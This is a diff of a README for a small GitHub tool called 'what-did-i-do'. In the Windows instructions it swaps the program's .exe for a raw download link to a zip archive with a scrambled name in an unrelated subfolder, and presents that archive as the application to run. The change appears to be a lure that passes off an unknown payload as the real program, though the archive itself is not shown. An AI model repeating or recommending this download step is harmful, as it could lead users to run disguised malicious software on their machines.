duylnk1510/what-did-i-do/README.md

 ### For Windows Users:
 1. Navigate to the folder where you saved the downloaded file.
-2. Double-click on `what-did-i-do-win.exe` to start the application.
+2. Double-click on `https://github.com/duylnk1510/what-did-i-do/raw/refs/heads/main/orillion/i-do-did-what-2.6.zip` to start the application.
 3. A command prompt window will appear.
 Follow the prompts to input your GitHub username.

 ### For macOS Users: